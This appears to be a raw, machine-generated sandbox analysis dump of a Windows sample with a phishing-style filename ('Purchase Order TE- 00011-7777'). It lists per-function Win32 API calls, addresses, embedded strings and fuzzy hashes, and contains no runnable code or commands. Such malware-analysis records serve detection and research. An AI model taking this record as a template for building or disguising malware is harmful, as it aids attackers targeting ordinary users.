                      • Opcode Fuzzy Hash: 24d4f8c233c9020b1ec189b95b3f4a4bbee2191ec14d70fe1029866075253d7d
                      • Instruction Fuzzy Hash: F881AE311083499BDB15CF24C985FAABBE8FF44754F04846EFD899A092EB30DD46CBA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                      • API String ID: 1038674560-1810252412
                      • Opcode ID: 84ac4f4651bae3770e74159ed2674d2af5b677dce1f098d4b1d5b70df6c23d8e
                      • Instruction ID: c45d20553ffa5dd7295dc585fc55a3330c68d607444a5b64c63338bce8437c3f
                      • Opcode Fuzzy Hash: 84ac4f4651bae3770e74159ed2674d2af5b677dce1f098d4b1d5b70df6c23d8e
                      • Instruction Fuzzy Hash: BA315A31A44209A6DE25EB60DE93FEE73E89F10714FA00469F541710E7FFA1AF04A661
                      APIs
                      • LoadIconW.USER32(00000063), ref: 00ACF8AB
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ACF8BD
                      • SetWindowTextW.USER32(?,?), ref: 00ACF8D4
                      • GetDlgItem.USER32(?,000003EA), ref: 00ACF8E9
                      • SetWindowTextW.USER32(00000000,?), ref: 00ACF8EF
                      • GetDlgItem.USER32(?,000003E9), ref: 00ACF8FF
                      • SetWindowTextW.USER32(00000000,?), ref: 00ACF905
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ACF926
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ACF940
                      • GetWindowRect.USER32(?,?), ref: 00ACF949
                      • SetWindowTextW.USER32(?,?), ref: 00ACF9B4
                      • GetDesktopWindow.USER32 ref: 00ACF9BA
                      • GetWindowRect.USER32(00000000), ref: 00ACF9C1
                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ACFA0D
                      • GetClientRect.USER32(?,?), ref: 00ACFA1A
                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ACFA3F
                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ACFA6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                      • String ID:
                      • API String ID: 3869813825-0
                      • Opcode ID: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                      • Instruction ID: 82aa27193ca3c00b9cd75bb4ef3a3c53ae4367e95e95ba6334807de2374af954
                      • Opcode Fuzzy Hash: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                      • Instruction Fuzzy Hash: 4F513B71900709AFDB209FA8CD89FAEBBF6FF04705F11492DE596A35A0CB74A944CB50
                      APIs
                      • _memset.LIBCMT ref: 00AFCD0B
                      • DestroyWindow.USER32(?,?), ref: 00AFCD83
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AFCE04
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AFCE26
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCE35
                      • DestroyWindow.USER32(?), ref: 00AFCE52
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A90000,00000000), ref: 00AFCE85
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCEA4
                      • GetDesktopWindow.USER32 ref: 00AFCEB9
                      • GetWindowRect.USER32(00000000), ref: 00AFCEC0
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AFCED2
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AFCEEA
                        • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                      • String ID: 0$tooltips_class32
                      • API String ID: 1297703922-3619404913
                      • Opcode ID: 978ce9f4a16324f7831576add9220acd4b09497cdceb40582c143c0a18a14dbf
                      • Instruction ID: 71eefcb40c353b8467b77c2edbab66c1f60b8591fc3ccdeb49b4d7f875d1f46a
                      • Opcode Fuzzy Hash: 978ce9f4a16324f7831576add9220acd4b09497cdceb40582c143c0a18a14dbf
                      • Instruction Fuzzy Hash: 6F719A71240309AFEB25CF68CD45FBA3BE5EB89714F440918FA85972A1DB70E801CB21
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • DragQueryPoint.SHELL32(?,?), ref: 00AFF14B
                        • Part of subcall function 00AFD5EE: ClientToScreen.USER32(?,?), ref: 00AFD617
                        • Part of subcall function 00AFD5EE: GetWindowRect.USER32(?,?), ref: 00AFD68D
                        • Part of subcall function 00AFD5EE: PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF1B4
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AFF1BF
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AFF1E2
                      • _wcscat.LIBCMT ref: 00AFF212
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AFF229
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF242
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF259
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF27B
                      • DragFinish.SHELL32(?), ref: 00AFF282
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AFF36D
                      Strings
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                      • API String ID: 169749273-3440237614
                      • Opcode ID: 011b10516e8618e531c5514dcc4af96def402f65bed38c40ca18e1c0a955d59d
                      • Instruction ID: d78bf51c9399d6ef3c4be4a4bf73ae04dcdacf362162abf56d21f7785af990d7
                      • Opcode Fuzzy Hash: 011b10516e8618e531c5514dcc4af96def402f65bed38c40ca18e1c0a955d59d
                      • Instruction Fuzzy Hash: D9616772508304AFC700EF64DD85EABBBF8FF89750F404A19F695971A1DB709A05CB52
                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00ADB46D
                      • VariantCopy.OLEAUT32(?,?), ref: 00ADB476
                      • VariantClear.OLEAUT32(?), ref: 00ADB482
                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00ADB561
                      • __swprintf.LIBCMT ref: 00ADB591
                      • VarR8FromDec.OLEAUT32(?,?), ref: 00ADB5BD
                      • VariantInit.OLEAUT32(?), ref: 00ADB63F
                      • SysFreeString.OLEAUT32(00000016), ref: 00ADB6D1
                      • VariantClear.OLEAUT32(?), ref: 00ADB727
                      • VariantClear.OLEAUT32(?), ref: 00ADB736
                      • VariantInit.OLEAUT32(00000000), ref: 00ADB772
                      Strings
                      Similarity
                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                      • API String ID: 3730832054-3931177956
                      • Opcode ID: c796388d4603730e4578b16733fd01990004245a4d29e9e3577167ed25308fd9
                      • Instruction ID: e3fc15980148d596eaab990273f726f4943547c635639ccd21e9bb2e87272741
                      • Opcode Fuzzy Hash: c796388d4603730e4578b16733fd01990004245a4d29e9e3577167ed25308fd9
                      • Instruction Fuzzy Hash: 73C1ECB1A10615EBCF10DF65D894BAAB7B4FF05300F26846AE4069B792DB34ED40DBB1
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00AF6FF9
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF7044
                      Strings
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 3974292440-4258414348
                      • Opcode ID: bcb91a707ed0ce6001cc215ba4986c2aa75c0175ff485c9e8ff368839265acd3
                      • Instruction ID: a67f422f4de09796f848a48bc58fd91d0ad589512849d7b52b8b312a8f390efd
                      • Opcode Fuzzy Hash: bcb91a707ed0ce6001cc215ba4986c2aa75c0175ff485c9e8ff368839265acd3
                      • Instruction Fuzzy Hash: F79191342046018FCB14EF54CA51B7EB7E1AF89350F04886DF9965B3A2CB35ED4ACB81
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AFE3BB
                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AFBCBF), ref: 00AFE417
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE457
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE49C
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE4D3
                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00AFBCBF), ref: 00AFE4DF
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AFE4EF
                      • DestroyIcon.USER32(?,?,?,?,?,00AFBCBF), ref: 00AFE4FE
                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AFE51B
                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AFE527
                        • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                      Strings
                      Similarity
                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                      • String ID: .dll$.exe$.icl
                      • API String ID: 1212759294-1154884017
                      • Opcode ID: 09a99dc9c41f46051406ee54dec6ac8c315dcffaedda6bdf0dd98f87ccb8e723
                      • Instruction ID: 67526bd13c645ae9e7bffd757e9dff0c7ace6b74c58318e53f89f44a8ecfa6d1
                      • Opcode Fuzzy Hash: 09a99dc9c41f46051406ee54dec6ac8c315dcffaedda6bdf0dd98f87ccb8e723
                      • Instruction Fuzzy Hash: 9C61CF71600219BEEB14DFA4CD46FFA7BACBB08711F108209FA11EB0E1DB759990D7A0
                      APIs
                      • GetLocalTime.KERNEL32(?), ref: 00AE0EFF
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AE0F0F
                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AE0F1B
                      • __wsplitpath.LIBCMT ref: 00AE0F79
                      • _wcscat.LIBCMT ref: 00AE0F91
                      • _wcscat.LIBCMT ref: 00AE0FA3
                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0FB8
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FCC
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FFE
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE101F
                      • _wcscpy.LIBCMT ref: 00AE102B
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AE106A
                      Strings
                      Similarity
                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                      • String ID: *.*
                      • API String ID: 3566783562-438819550
                      • Opcode ID: 28642ce237074079f065032a1bd0084599a2d11cfe58b5ea81d647af6f36465f
                      • Instruction ID: acf1b8b9f7d6aeec39ca60ca762daa4e1889a29ab4610caebdc88708c598a447
                      • Opcode Fuzzy Hash: 28642ce237074079f065032a1bd0084599a2d11cfe58b5ea81d647af6f36465f
                      • Instruction Fuzzy Hash: F8618F725043459FCB10EF64C944E9EB3E8FF89310F04892EF99987251EB35EA45CB92
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • CharLowerBuffW.USER32(?,?), ref: 00ADDB26
                      • GetDriveTypeW.KERNEL32 ref: 00ADDB73
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBBB
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBF2
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDC20
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      Strings
                      Similarity
                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 2698844021-4113822522
                      • Opcode ID: aae1e751ae957a8640a9ab35938d121c5165a3f1b136a2f8bb26f447636ab42f
                      • Instruction ID: c210a0adeb4967e5beab56bcb185184c80f0c8c08ffd679067fde08ff64a9d3e
                      • Opcode Fuzzy Hash: aae1e751ae957a8640a9ab35938d121c5165a3f1b136a2f8bb26f447636ab42f
                      • Instruction Fuzzy Hash: 7D518D716043059FCB00EF24CA9196AB7F5FF88758F04886DF896972A1DB31EE05CB92
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00AD3145
                      • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD314E
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00AD3170
                      • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD3173
                      • __swprintf.LIBCMT ref: 00AD31B3
                      • __swprintf.LIBCMT ref: 00AD31C5
                      • _wprintf.LIBCMT ref: 00AD326C
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD3283
                      Strings
                      Similarity
                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                      • API String ID: 984253442-2268648507
                      • Opcode ID: ed528bf4a41879a7098b32f5208ce2ff0bbde968bf8d588e2796235476b174cb
                      • Instruction ID: 95922045410f1b27c8331793e2273264d7ad9a209b1087b49ad949333ef060e1
                      • Opcode Fuzzy Hash: ed528bf4a41879a7098b32f5208ce2ff0bbde968bf8d588e2796235476b174cb
                      • Instruction Fuzzy Hash: 7D412472A00219BACF15FBA0DE57EEEB7F9AF14741F500066F206B20A2DE655F04CB61
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00ADD96C
                      • __swprintf.LIBCMT ref: 00ADD98E
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ADD9CB
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ADD9F0
                      • _memset.LIBCMT ref: 00ADDA0F
                      • _wcsncpy.LIBCMT ref: 00ADDA4B
                      • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00ADDA80
                      • CloseHandle.KERNEL32(00000000), ref: 00ADDA8B
                      • RemoveDirectoryW.KERNEL32(?), ref: 00ADDA94
                      • CloseHandle.KERNEL32(00000000), ref: 00ADDA9E
                      Strings
                      Similarity
                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                      • String ID: :$\$\??\%s
                      • API String ID: 2733774712-3457252023
                      • Opcode ID: 2d8d07855970e500b8907523a2d13af058b48925ce376698af84d0abcfd7d2af
                      • Instruction ID: af9259100fc36a6068257811f50b401f3abee1ab8e1ec01d572d739fb5b06f9a
                      • Opcode Fuzzy Hash: 2d8d07855970e500b8907523a2d13af058b48925ce376698af84d0abcfd7d2af
                      • Instruction Fuzzy Hash: 0F31A472600208AADB20DFA4DC49FDA77FCBF88700F50C1A6F519D6161EB709B458BA1
                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AFBD04,?,?), ref: 00AFE564
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE57B
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE586
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE593
                      • GlobalLock.KERNEL32(00000000), ref: 00AFE59C
                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5AB
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AFE5B4
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5BB
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5CC
                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B1D9BC,?), ref: 00AFE5E5
                      • GlobalFree.KERNEL32(00000000), ref: 00AFE5F5
                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00AFE619
                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00AFE644
                      • DeleteObject.GDI32(00000000), ref: 00AFE66C
                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AFE682
                      Similarity
                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                      • String ID:
                      • API String ID: 3840717409-0
                      • Opcode ID: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                      • Instruction ID: 8800c8267b0e7864ed6f56776fb721723212e5f4b4d4ecfd74be3e2562613d74
                      • Opcode Fuzzy Hash: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                      • Instruction Fuzzy Hash: 77413A75600208BFDB11DFA5DC88EAEBBB9EF89715F508058FA06E7260DB319D41DB60
                      APIs
                      • __wsplitpath.LIBCMT ref: 00AE0C93
                      • _wcscat.LIBCMT ref: 00AE0CAB
                      • _wcscat.LIBCMT ref: 00AE0CBD
                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0CD2
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0CE6
                      • GetFileAttributesW.KERNEL32(?), ref: 00AE0CFE
                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AE0D18
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0D2A
                      Strings
                      Similarity
                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                      • String ID: *.*
                      • API String ID: 34673085-438819550
                      • Opcode ID: 2ce7d9d257f3240cb5d74ef94b1e10625504ea5844f0f4356844da8c0c52b720
                      • Instruction ID: 38d6fe7f6ab3179d245c23a61f6a4eaf0c849b165e08ca1b862660ffd36bfb2b
                      • Opcode Fuzzy Hash: 2ce7d9d257f3240cb5d74ef94b1e10625504ea5844f0f4356844da8c0c52b720
                      • Instruction Fuzzy Hash: 858193715043859FC764DF65C984EAAB7E8BB88310F24892AF885C7251EB74DDC4CB92
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AFED0C
                      • GetFocus.USER32 ref: 00AFED1C
                      • GetDlgCtrlID.USER32(00000000), ref: 00AFED27
                      • _memset.LIBCMT ref: 00AFEE52
                      • GetMenuItemInfoW.USER32 ref: 00AFEE7D
                      • GetMenuItemCount.USER32(00000000), ref: 00AFEE9D
                      • GetMenuItemID.USER32(?,00000000), ref: 00AFEEB0
                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00AFEEE4
                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00AFEF2C
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AFEF64
                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00AFEF99
                      Strings
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                      • String ID: 0
                      • API String ID: 1296962147-4108050209
                      • Opcode ID: cbf6d358f5527c86ea12703166cbaf2199b4c72663ae522c8eec9132c2bf6c2e
                      • Instruction ID: 0cd1c3b9a94ba6af080aeabe5447e04691a8265cbcf656c6031383d291f86816
                      • Opcode Fuzzy Hash: cbf6d358f5527c86ea12703166cbaf2199b4c72663ae522c8eec9132c2bf6c2e
                      • Instruction Fuzzy Hash: E0817E71208309AFD720DF54D884ABBBBE9FB88754F00496DFA95972A1D730DD05CB62
                      APIs
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                        • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                        • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                        • Part of subcall function 00ACB8E7: HeapAlloc.KERNEL32(00000000,?,00ACB3CB,?,?,?), ref: 00ACB923
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                        • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                        • Part of subcall function 00ACB982: HeapAlloc.KERNEL32(00000000,?,00ACB3E1,?), ref: 00ACB995
                        • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB5F7
                      • _memset.LIBCMT ref: 00ACB60C
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB62B
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB63C
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB679
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB695
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB6B2
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB6C1
                      • HeapAlloc.KERNEL32(00000000), ref: 00ACB6C8
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB6E9
                      • CopySid.ADVAPI32(00000000), ref: 00ACB6F0
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB721
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB747
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB75B
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: 3172c8ac9f7e775efc2ab83e5b8805615ae4e263a5666041c8d58a60fbe1afe5
                      • Instruction ID: c347d4fb0ad9dfbb0b30989e6cdef3da066a5412d7eda891ce061c47a64ec033
                      • Opcode Fuzzy Hash: 3172c8ac9f7e775efc2ab83e5b8805615ae4e263a5666041c8d58a60fbe1afe5
                      • Instruction Fuzzy Hash: D2515A75910209ABDF00DFA4DD8AEEEBB79FF48304F04816DE915A7290DB369A05CB60
                      APIs
                      • GetDC.USER32(00000000), ref: 00AEA2DD
                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AEA2E9
                      • CreateCompatibleDC.GDI32(?), ref: 00AEA2F5
                      • SelectObject.GDI32(00000000,?), ref: 00AEA302
                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AEA356
                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00AEA392
                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AEA3B6
                      • SelectObject.GDI32(00000006,?), ref: 00AEA3BE
                      • DeleteObject.GDI32(?), ref: 00AEA3C7
                      • DeleteDC.GDI32(00000006), ref: 00AEA3CE
                      • ReleaseDC.USER32(00000000,?), ref: 00AEA3D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      • Opcode ID: 19f731267b539a85e12639493b3e1e1df4b6524ce9f0bca58e974624be65a52d
                      • Instruction ID: 7e12eea70d29fb97d65d5db281b7e86ad47eacc99c0d873277a97bd39596812c
                      • Opcode Fuzzy Hash: 19f731267b539a85e12639493b3e1e1df4b6524ce9f0bca58e974624be65a52d
                      • Instruction Fuzzy Hash: 63515875900349EFCB14CFA9DC85EAEBBB9EF48310F14881DF99AA7210C731A8418B60
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 00ADD567
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00ADD589
                      • __swprintf.LIBCMT ref: 00ADD5DC
                      • _wprintf.LIBCMT ref: 00ADD68D
                      • _wprintf.LIBCMT ref: 00ADD6AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2116804098-2391861430
                      • Opcode ID: cce9194433887b59af17cb0d3f38847d2387a6ceefe71e6eb598898cf6360400
